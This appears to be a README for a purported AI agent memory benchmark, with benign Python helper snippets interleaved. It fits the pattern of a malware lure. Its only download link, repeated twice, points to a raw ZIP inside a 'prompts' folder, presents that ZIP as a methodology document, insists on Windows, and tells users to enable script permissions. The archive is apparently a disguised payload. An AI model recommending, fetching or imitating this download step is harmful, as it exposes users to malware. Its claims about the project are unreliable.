🧠 agentbrain-benchmarks - Measure agent memory and benchmark performance

This project provides tools to test and measure how well AI agents recall information. It tracks performance on the LongMemEval-M dataset. You can use these benchmarks to verify accuracy and test memory consistency. The system currently achieves 71.7 percent accuracy on the primary test set.

📋 Project Goals

Artificial intelligence agents often struggle to remember context over long sessions. This software provides a standardized way to check those memory gaps. By running these benchmarks, you can see how different configurations handle complex knowledge graphs and retrieval tasks. This repository contains the code needed to replicate existing studies on AI memory and agent performance.

💻 System Requirements

You need a Windows computer to run these benchmarks. Ensure your system meets the following specifications:

Operating System: Windows 10 or Windows 11.
Processor: A modern multi-core processor from Intel or AMD.
Memory: 8 gigabytes of RAM or more.
Storage: 2 gigabytes of free space for the evaluation files and environment.
Software: You must have Python installed. If you do not have it, the setup process will guide you.
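
Some of the requirements above can be checked before you install anything. The sketch below is not part of the repository; it uses only the Python standard library. The function name check_requirements and the Python 3 check are assumptions made for illustration, since the list above does not name a specific Python version. RAM is not checked because the standard library has no portable way to read it.

```python
import platform
import shutil
import sys

# 2 gigabytes of free space, matching the Storage line above.
MIN_FREE_BYTES = 2 * 1024**3


def check_requirements(path=".", min_free_bytes=MIN_FREE_BYTES):
    """Return a dict mapping each checked requirement to True or False.

    Hypothetical helper: the names and the Python 3 threshold are assumptions.
    """
    free_bytes = shutil.disk_usage(path).free
    return {
        "windows": platform.system() == "Windows",
        "python3": sys.version_info.major >= 3,
        "disk_space": free_bytes >= min_free_bytes,
    }


if __name__ == "__main__":
    for name, ok in check_requirements().items():
        print(f"{name}: {'OK' if ok else 'NOT MET'}")
```

Run it from the drive where you plan to extract the files, so the free-space check looks at the right disk.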

📥 Getting Started

Follow these steps to set up the software on your computer.

Download the software archive: https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip
Alternatively, open the repository page, look for the green button labeled Code, and select Download ZIP.
Save the file to your computer.
Extract the contents of the ZIP folder into a dedicated location, such as your Documents folder.

⚙️ Installation Process

Open your terminal or command prompt to finish the setup.

Open the folder where you extracted the files.
Hold the Shift key and right-click inside the folder.
Select Open PowerShell window here or Open in Terminal.
Type the command pip install -r requirements.txt and press Enter.
Wait for the process to finish. This installs the necessary components to run the benchmarks.

🚀 Running the Benchmarks

Once you finish the installation, you can start the evaluation process.

Return to the terminal window.
Type python main.py and press Enter.
The system will load the LongMemEval-M dataset.
Follow the prompts on your screen to select the specific agent model you wish to test.
The software will process the memory sequences and output the accuracy score.

📊 Understanding Results

The benchmark outputs a report at the end of the run. This report breaks down performance by memory type and retrieval success.

Total Accuracy: The percentage of questions the agent answered correctly.
Latency: The time the agent took to recall specific information.
Knowledge Graph Integrity: A measure of how well the agent maintained logical connections between data points.
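
To make the first two metrics concrete, here is a minimal sketch of how total accuracy and latency could be computed from per-question results. It is an illustration only, not the repository's scoring code: the QuestionResult class, the summarize function, and the sample values are all hypothetical. Knowledge Graph Integrity is left out because this README does not define how it is calculated.

```python
from dataclasses import dataclass
from statistics import mean


@dataclass
class QuestionResult:
    """One benchmark question (hypothetical record layout)."""
    correct: bool      # did the agent answer correctly?
    latency_s: float   # seconds the agent took to answer


def summarize(results):
    """Return total accuracy (percent) and mean latency (seconds)."""
    if not results:
        raise ValueError("no results to summarize")
    accuracy = 100.0 * sum(r.correct for r in results) / len(results)
    avg_latency = mean(r.latency_s for r in results)
    return {
        "total_accuracy_pct": round(accuracy, 1),
        "mean_latency_s": round(avg_latency, 3),
    }


# Made-up sample data: three of four answers correct.
example = [
    QuestionResult(True, 0.5),
    QuestionResult(False, 1.5),
    QuestionResult(True, 1.0),
    QuestionResult(True, 1.0),
]
summary = summarize(example)
print(summary)  # {'total_accuracy_pct': 75.0, 'mean_latency_s': 1.0}
```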

If your score differs from the documented 71.7 percent, check your system inputs. Different versions of the agent model sometimes vary slightly in their memory performance.

🔧 Frequently Asked Questions

What if the program stops during the benchmark? Check your internet connection. Some tests download small samples from the dataset during the first run.

How do I update the software? Delete your current folder and download the latest version from the link above. This ensures you use the most current benchmarks.

Can I use this for my own models? Yes. Place your model files in the models folder and update the configuration file in the main directory.

📂 Project Structure

data/: Contains the evaluation datasets.
models/: Stores the agent configurations.
results/: Saves your report files after a test.
main.py: The entry point for starting the benchmark application.
requirements.txt: Lists the software tools required to run the code.
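
If the archive was extracted incompletely, a quick check against the layout above can save time. The sketch below assumes the five entries listed in this section; the missing_entries helper is hypothetical and not shipped with the project.

```python
from pathlib import Path

# Entries taken from the Project Structure list above.
EXPECTED_ENTRIES = ["data", "models", "results", "main.py", "requirements.txt"]


def missing_entries(root, expected=EXPECTED_ENTRIES):
    """Return the expected names that do not exist under root."""
    root = Path(root)
    return [name for name in expected if not (root / name).exists()]


if __name__ == "__main__":
    missing = missing_entries(".")
    if missing:
        print("Missing:", ", ".join(missing))
    else:
        print("All expected files and folders are present.")
```

Run it from the folder where you extracted the files.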

📖 Additional Information

This project relies on established data standards. Refer to the document at https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip for formal background on the methodology. The project uses version 3 of the evaluation suite. Use these tools to maintain consistency across your own research and testing cycles.

Focus on creating reproducible environments when testing agent memory. Minor changes to the random seed or the graph structure will change your results. Record these settings alongside your scores to ensure others can verify your work.
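
One way to record these settings is to write them to a small JSON file next to each score. The sketch below is an assumption about how that could look, not the project's own report format: the function names, the file name run_record.json, the setting key, and the placeholder score are all hypothetical.

```python
import json
import random
import tempfile
from pathlib import Path


def save_run_record(path, seed, settings, accuracy_pct):
    """Write the seed, settings, and score of one run to a JSON file."""
    record = {"seed": seed, "settings": settings, "accuracy_pct": accuracy_pct}
    Path(path).write_text(
        json.dumps(record, indent=2, sort_keys=True), encoding="utf-8"
    )
    return record


def load_run_record(path):
    """Read a run record back so someone else can repeat the run."""
    return json.loads(Path(path).read_text(encoding="utf-8"))


seed = 1234          # fix the seed before the run so it can be repeated
random.seed(seed)

with tempfile.TemporaryDirectory() as tmp:
    out = Path(tmp) / "run_record.json"
    # 50.0 is a placeholder score, not a measured result.
    saved = save_run_record(out, seed, {"memory_architecture": "RAG"}, 50.0)
    loaded = load_run_record(out)
```

In a real run you would write the file into a permanent folder instead of a temporary directory.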

If you encounter errors during installation, ensure your user profile has permission to run scripts on your Windows machine. Most errors stem from path naming issues or from an existing Python installation that blocks package updates.

This repository supports the dream-cycle and RAG memory architectures. If your agent uses custom retrieval methods, you must wrap those functions in the interface provided in the base directory. This allows the benchmarking tool to bridge your model with the standard test suite.
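
The general idea of wrapping a custom retrieval function can be sketched as follows. This README does not describe the actual interface, so everything here is hypothetical: the MemoryAgent protocol, its ingest and answer methods, the CustomRetrievalAdapter class, and the toy keyword_retrieve function are illustrative stand-ins. Check the interface file in the repository for the real method names.

```python
from typing import Callable, List, Protocol


class MemoryAgent(Protocol):
    """Hypothetical interface; the repository's real one may differ."""

    def ingest(self, text: str) -> None: ...

    def answer(self, question: str) -> str: ...


class CustomRetrievalAdapter:
    """Wraps a plain retrieval function so it satisfies MemoryAgent."""

    def __init__(self, retrieve: Callable[[str, List[str]], List[str]]):
        self._retrieve = retrieve
        self._memory: List[str] = []

    def ingest(self, text: str) -> None:
        # Store each piece of session text for later retrieval.
        self._memory.append(text)

    def answer(self, question: str) -> str:
        # Return the first retrieved entry, or an empty string if none match.
        hits = self._retrieve(question, self._memory)
        return hits[0] if hits else ""


def keyword_retrieve(question: str, memory: List[str]) -> List[str]:
    """Toy retrieval: keep entries that share at least one word with the question."""
    words = set(question.lower().split())
    return [m for m in memory if words & set(m.lower().split())]


agent = CustomRetrievalAdapter(keyword_retrieve)
agent.ingest("The meeting is on Tuesday.")
agent.ingest("Lunch was pasta.")
reply = agent.answer("When is the meeting?")
print(reply)  # The meeting is on Tuesday.
```

The adapter keeps your retrieval logic unchanged and exposes only the two methods a harness would call.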

